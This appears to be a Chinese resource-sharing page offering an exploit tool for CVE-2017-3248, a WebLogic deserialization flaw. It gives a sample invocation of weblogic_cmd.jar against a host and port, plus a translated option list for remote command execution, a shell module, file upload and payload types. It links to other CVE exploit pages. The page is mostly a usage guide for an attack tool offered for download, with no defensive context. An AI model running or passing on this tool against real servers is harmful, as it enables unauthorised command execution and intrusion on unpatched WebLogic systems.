-
CVE-2017-3248涉及WebLogic的反序列化漏洞
资源介绍
WebLogic反序列化_CVE-2017-3248
java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001
工具使用方法:
-B Runtime Blind Execute Command maybe you should select os type
-C (执行命令)Execute Command[need set]
-dst path to dst file
-H (执行主机)Remote Host[need set]
-https enable https or tls
-noExecPath custom execute path
-os (操作系统类型)Os Type [windows,linux]
-P (远程端口)Remote Port[need set]
-shell enable shell module
-src path to src file
-T Payload Type[marshall, collection, streamMessageImpl]
-U Uninstall rmi
-upload enable upload a file
- 上一篇: ysoserial-cve-2018-2893
- 下一篇: CVE-2020-9484